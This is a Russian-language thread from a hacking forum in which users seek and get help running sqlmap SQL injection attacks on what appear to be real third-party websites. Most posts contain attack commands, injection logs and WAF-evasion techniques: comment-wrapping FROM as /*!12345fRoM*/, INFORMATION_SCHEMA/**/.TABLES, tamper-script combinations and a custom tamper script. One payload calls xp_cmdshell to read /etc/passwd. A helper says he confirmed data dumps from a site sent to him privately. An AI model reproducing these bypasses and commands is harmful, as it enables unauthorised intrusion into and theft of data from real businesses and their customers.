Скрытый контент для пользователей: c0d3x.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
Это уже не фильтрует, это уже просто лаги, и это нормальное явление при boolean/time-based.
--dump --where="age=20"
Dump specific entry · Issue #750 · sqlmapproject/sqlmap
Like can I dump a entry with it's id=1 or a entry whose name='username' Ps I got the table name colmun name database name.
github.com
Сайт не открывается. 504 ошибка. Но если там отдает SELECT command denied to user - то можно не продолжать потеть, это финиш.
Подскажите пожалуйста пробовал с разными командами но итог один и тот же, не выводится инфо шема, а в следствии не выводятся таблицы итд.
Код:
--random-agent --dbs --dbms=MySQL --risk=3 --level=5 --technique=B --tamper=between --flush-session
Код:
[10:52:44] [INFO] loading tamper module 'between'
[10:52:44] [INFO] fetched random HTTP User-Agent header value 'Opera/9.23 (Mac OS X; ru)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:52:47] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('SHOP_SESSION_TOKEN=mgj9satkk0i...kordokgng2'). Do you want to use those [Y/n] y
[10:52:52] [INFO] testing if the target URL content is stable
[10:52:53] [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) by using higher verbosity levels
[10:52:53] [INFO] testing if URI parameter '#1*' is dynamic
[10:52:54] [WARNING] URI parameter '#1*' does not appear to be dynamic
[10:52:56] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[10:52:57] [INFO] testing for SQL injection on URI parameter '#1*'
[10:52:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:53:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[10:54:13] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[10:54:13] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[10:54:13] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://www.site.com:443/remote.php?options=-5825' OR 4344=4344-- glHx21=6 AND 000812=000812 -- &productId=productId&w=GetVariationOptions
---
[11:00:31] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:00:31] [INFO] testing MySQL
[11:00:58] [INFO] confirming MySQL
[11:01:10] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.21.6
back-end DBMS: MySQL >= 5.0.0 (Drizzle fork)
[11:01:15] [INFO] fetching database names
[11:01:15] [INFO] fetching number of databases
[11:01:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:01:15] [INFO] retrieved:
[11:01:16] [WARNING] unexpected HTTP code '406' detected. Will use (extra) validation step in similar cases
[11:01:20] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:01:20] [ERROR] unable to retrieve the number of databases
[11:01:20] [INFO] falling back to current database
[11:01:20] [INFO] fetching current database
[11:01:20] [INFO] retrieved: test_ecommerce
available databases [1]:
[*] test_ecommerce
[11:07:28] [WARNING] HTTP error codes detected during run:
406 (Not Acceptable) - 9 timesТут руками смотреть надо, он получает только database(), фильтр на from скорее всего.
Вот я же писал здесь уже. РУКАМИ надо проверять. Берешь запрос из мапа на который отдает 406, вставляешь его в хром или в любой билдер, и пытаешься нащупать слово или символ на который отдает ошибку. Это заняло 15 секунд у меня. Здесь фильтруются все запросы в которых присутствуют слова SELECT, FROM, INFORMATION_SCHEMA.TABLES.
- SELECT или FROM - одно из двух надо взять в коммент, например так: /*!12345fRoM*/
- INFORMATION_SCHEMA.TABLES - здесь можно просто пустой коммент добавить перед точкой, например так: INFORMATION_SCHEMA/**/.TABLES - для этого и тампер есть: informationschemacomment
- Как я понял что именно эти слова фильтруются? Взял запрос из мапа, на который отдается 406 ошибка, вставил его в хром, и начал убирать первую букву из каждого слова на которое может срабатывать WAF. Убрал первую букву сначала у FROM, но WAF продолжал срабатывать, потом убрал первую букву у INFORMATION_SCHEMA.TABLES - WAF перестал срабатывать. Для того что-бы убедиться что фильтруются именно 2 слова этих, а не какое-то одно - вернул первую букву для FROM - WAF снова начал срабатывать. Эврика епта!
- Данные дампятся, я проверил. Ты же мне скидывал этот сайт в личку. Умоляю прекратите скидывать сайты. Я здесь уже как на работе нахуй
Последнее редактирование:
Вот я же писал здесь уже. РУКАМИ надо проверять. Берешь запрос из мапа на который отдает 406, вставляешь его в хром или в любой билдер, и пытаешься нащупать слово или символ на который отдает ошибку. Это заняло 15 секунд у меня. Здесь фильтруются все запросы в которых присутствуют слова SELECT, FROM, INFORMATION_SCHEMA.TABLES.
- SELECT или FROM - одно из двух надо взять в коммент, например так: /*!12345fRoM*/
- INFORMATION_SCHEMA.TABLES - здесь можно просто пустой коммент добавить перед точкой, например так: INFORMATION_SCHEMA/**/.TABLES - для этого и тампер есть: informationschemacomment
- Как я понял что именно эти слова фильтруются? Взял запрос из мапа, на который отдается 406 ошибка, вставил его в хром, и начал убирать первую букву из каждого слова на которое может срабатывать WAF. Убрал первую букву сначала у FROM, но WAF продолжал срабатывать, потом убрал первую букву у INFORMATION_SCHEMA.TABLES - WAF перестал срабатывать. Для того что-бы убедиться что фильтруются именно 2 слова этих, а не какое-то одно - вернул первую букву для FROM - WAF снова начал срабатывать. Эврика епта!
- Данные дампятся, я проверил. Ты же мне скидывал этот сайт в личку. Умоляю прекратите скидывать сайты. Я здесь уже как на работе нахуй
Скрытый контент для пользователей: c0d3x.
Сделать тампер который будет заменять FROM на /*!12345fRoM*/. Как сделать, показывал на прошлой странице этого топика: https://xss.pro/threads/14482/post-569742
Далее команда мапу:
Код:
sqlmap.py -u "https://твой_таргет/remote.php?options=1*&productId=productId&w=GetVariationOptions" --dbs --dbms=MySQL --risk=3 --level=5 --tamper=имя_твоего_тампера_для_from,informationschemacomment --technique=BСкрытый контент для пользователей: c0d3x.
Ты сам на это подписался ))) И именно по этой причине я и забил. Заебут и спасибо не скажут ))) Хотя ВСЯ нужная им инфа здесь же в теме, на предидущих страницах. Людям лень искать и пробовать, есть же ты, который за них сделает - зачем напрягаться? o_0Умоляю прекратите скидывать сайты. Я здесь уже как на работе нахуй
готовые уже есть в мапе. По итогу должно быть --tamper="modsecurityversioned,randomcase,informationschemacomment" Этот "набор" засунет весь пэйлоад в условия тамперов, потому мэйби informationschemacomment будет не нужен, если там рили ModSecurity WAF (а судя по обходу, там или он, или его набор рулезов).
Последнее редактирование:
Это ложный положительный результат от акунетикса?
Если нет, что я могу сделать?
Зачем пейлоад акунетикса вставил в запрос?
https://xss.pro/threads/69783/post-475168
https://xss.pro/threads/69783/#post-492045
подскажите пожалуйста , а что тут может блокировать
в конце выходит так
Код:
sqlmap -u "https://www.site.com/search.php?bid=399" --random-agent --dbs --dbms=MySQL --risk=3 --level=5 -v3 --flush-session
Код:
[19:03:24] [DEBUG] cleaning up configuration parameters
[19:03:24] [DEBUG] setting the HTTP timeout
[19:03:24] [DEBUG] setting the HTTP User-Agent header
[19:03:24] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[19:03:24] [INFO] fetched random HTTP User-Agent header value 'Opera/9.20 (X11; Linux i686; U; es-es)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[19:03:24] [DEBUG] creating HTTP requests opener object
[19:03:24] [DEBUG] forcing back-end DBMS to user defined value
[19:03:26] [DEBUG] setting the HTTP Referer header to the target URL
[19:03:26] [DEBUG] setting the HTTP Host header to the target URL
[19:03:26] [INFO] flushing session file
[19:03:26] [DEBUG] resolving hostname 'www.site.com'
[19:03:26] [INFO] testing connection to the target URL
[19:03:28] [DEBUG] declared web page charset 'utf-8'
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4df39c5a430...b73db054ff'). Do you want to use those [Y/n] y
[19:03:33] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:03:33] [PAYLOAD] 9719 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
[19:03:34] [DEBUG] declared web page charset 'iso-8859-1'
[19:03:34] [DEBUG] got HTTP error code: 503 ('Service Unavailable')
[19:03:34] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n]
[19:13:34] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 1 times
[19:13:34] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
[19:13:34] [ERROR] user quitв конце выходит так
Код:
[09:30:59] [INFO] GET parameter 'bid' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="XL")
[09:31:26] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[09:35:42] [INFO] checking if the injection point on GET parameter 'bid' is a false positive
GET parameter 'bid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 54 HTTP(s) requests:
---
Parameter: bid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bid=399) AND 5518=5518 AND (4789=4789
---
[09:52:07] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[09:52:07] [INFO] testing MySQL
[09:52:12] [INFO] confirming MySQL
[09:52:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.0.0
[09:52:28] [INFO] fetching database names
[09:52:28] [INFO] fetching number of databases
[09:52:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:52:28] [INFO] retrieved:
[09:52:30] [WARNING] unexpected HTTP code '503' detected. Will use (extra) validation step in similar cases
[09:52:34] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:52:34] [ERROR] unable to retrieve the number of databases
[09:52:34] [INFO] falling back to current database
[09:52:34] [INFO] fetching current database
[09:52:34] [INFO] retrieved:
[09:52:38] [CRITICAL] unable to retrieve the database names
[09:52:38] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 9 timesЗдесь же реакции вместо спасибо.
А по поводу этой и соседних тем по SQL - действительно клад с информацией, но чтобы начать ее реально понимать нужен какой-то импульс, и возможно когда конкретный человек отвечает на конкретный вопрос по твоему конкретному таргету - тебе удается понять гораздо больше чем от сухого прочтения чужих постов и иногда даже круто написанных статей(в которых 100% много полезного).
Если я c0d3x'а или кого то иного напряг своими вопросами - то сорри, и благодарю еще раз
Проблем может быть множество, а последствия могут быть самыми разными.
По факту тут ванги нет, фильтр может быть на пробел,точку,запятую,нижнее подчеркивание, на слово или связку слов.
Тебе выше ответили как проверять на что фильтр.
Скрытый контент для пользователей: c0d3x.
Так и я подписываюсь , под каждым словом , что ты говришь. я рельно по 100 раз пишу спасибо. Я вообще по другому начал смотреть на цели , когда увидил что человек , не простыми отсылами , а именно на твоем примере показывает, как и что нужно сделать, я начал больше читать и искать инфы.Здесь же реакции вместо спасибо.
А по поводу этой и соседних тем по SQL - действительно клад с информацией, но чтобы начать ее реально понимать нужен какой-то импульс, и возможно когда конкретный человек отвечает на конкретный вопрос по твоему конкретному таргету - тебе удается понять гораздо больше чем от сухого прочтения чужих постов и иногда даже круто написанных статей(в которых 100% много полезного).
Если я c0d3x'а или кого то иного напряг своими вопросами - то сорри, и благодарю еще раз
Так что от меня тоже еще раз спасибо большое!
Код:
c0d3xУмей читать между строк.Здесь же реакции вместо спасибо.
Импульс придает не конкретный разбор твоей конкретной баги кем то, а твой личный успех, когда ты сам допёр, что и как делать, а главное, почему не получалось ранее. Вкорне неверный подход искать инфу после того как показали, что и куда. Надо искать до. Чтобы понимать, что ты делаешь. Иначе твое обучение займет в разы больше времени, на порядки, а методы и техники будут крайне ограничены и однообразны, в очень узкой области применения и ваще без фантазии и огонька
.. А у вас опять всё сводится к "ткните носом"\"проведите за ручку". Тем более пошла раздражающая тенденция, не думая сыпать под хайды все свои таргеты, где не получилось.Сейчас есть куча бесплатных лаб и академий, ctf и тренировочных площадок, чужих writeups с подробнейшими разборами всего и вся. Однако большинство, не разбираясь что делают, запускают сканы на рил таргетах, потом пихают в мап кучу бесполезных кеев и тамперов (которые только мешают), пихают пэйлоады со сканера и не смотрят на вывод мапа, не пытаются даже попробовать рускрутить до мапа руками (чтобы понять, как это вообще работает), не понимают, почему сервак выдает Not Acceptable или Forbidden (даже не знают кодов 406\403), не смотрят ошибки на самом таргете - и задрачивают одно и то же по кругу, не пытаются почитать, что делает тот или иной оператор, не отдупляют в синтаксисе (вся инфа бесплатна и открыта), но лезут сука уже ломать что то. Не удивлюсь, если некоторые даже сайт только один раз открывали, перед тем как в сканер засунуть. А некоторые даже не понимают разницу, между http и https o_0, хацкеры сука. Я уже страниц 15 наверное не наблюдал интересных вопросов. Всё одно и то же
Никого конкретного не имелось ввиду. Просто всё, что вы спросите, с вероятностью в 99% обсуждалось на предидущих страницах. Даже твой последний вопрос обсуждался несколькими постами ранее до него. Постами, даже не страницами! О чем тут можно говорить...Если я c0d3x'а или кого то иного напряг своими вопросами - то сорри, и благодарю еще раз
Последнее редактирование:
Пробовал я убирать как писалось выше делать, но так же была ошибка. потом я добавил # в конце линка и начало пайлода
Код:
https://www.site.com/search.php?bid=399#9719 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
Код:
#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
return payload.replace("=399", "=399#") if payload else payload[PAYLOAD] 399) AND
[PAYLOAD] 5290 AND
[PAYLOAD] 2303
опять срабатывает. это мне нужно на каждый пайлод тампер писать? по типу
Код:
#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
return payload.replace("=399", "=399#5290)") if payload else payloadСкрытый контент для пользователей: c0d3x.
Тоже наблюдал за твоими ответами и ответамиc0d3xУмей читать между строк.
Импульс придает не конкретный разбор твоей конкретной баги кем то, а твой личный успех, когда ты сам допёр, что и как делать, а главное, почему не получалось ранее. Вкорне неверный подход искать инфу после того как показали, что и куда. Надо искать до. Чтобы понимать, что ты делаешь. Иначе твое обучение займет в разы больше времени, на порядки, а методы и техники будут крайне ограничены и однообразны, в очень узкой области применения и ваще без фантазии и огонька
Сейчас есть куча бесплатных лаб и академий, ctf и тренировочных площадок, чужих writeups с подробнейшими разборами всего и вся. Однако большинство, не разбираясь что делают, запускают сканы на рил таргетах, потом пихают в мап кучу бесполезных кеев и тамперов (которые только мешают), пихают пэйлоады со сканера и не смотрят на вывод мапа, не пытаются даже попробовать рускрутить до мапа руками (чтобы понять, как это вообще работает), не понимают, почему сервак выдает Not Acceptable или Forbidden (даже не знают кодов 406\403), не смотрят ошибки на самом таргете - и задрачивают одно и то же по кругу, не пытаются почитать, что делает тот или иной оператор, не отдупляют в синтаксисе (вся инфа бесплатна и открыта), но лезут сука уже ломать что то. Не удивлюсь, если некоторые даже сайт только один раз открывали, перед тем как в сканер засунуть. А некоторые даже не понимают разницу, между http и https o_0, хацкеры сука. Я уже страниц 15 наверное не наблюдал интересных вопросов. Всё одно и то же
Никого конкретного не имелось ввиду. Просто всё, что вы спросите, с вероятностью в 99% обсуждалось на предидущих страницах. Даже твой последний вопрос обсуждался несколькими постами ранее до него. Постами, даже не страницами! О чем тут можно говорить...
порой складывалось впечатление как будто вы тут работаете.
Я тоже за то что нужно обучаться, и какая разница что кто-то умеет(ну когда ответ дают), нужно самому учиться, и те таргеты которые не можешь, значит пока не понимаешь как. Если не понимаешь, то просто отложи его, потом время будет, можно будет попробовать что-то новое...только так и развиваешься. Получается так, что делаешь рутину(то что уже понимаешь и хорошо разбираешься) и обучаешься новому, на таргетах которые не понимаешь.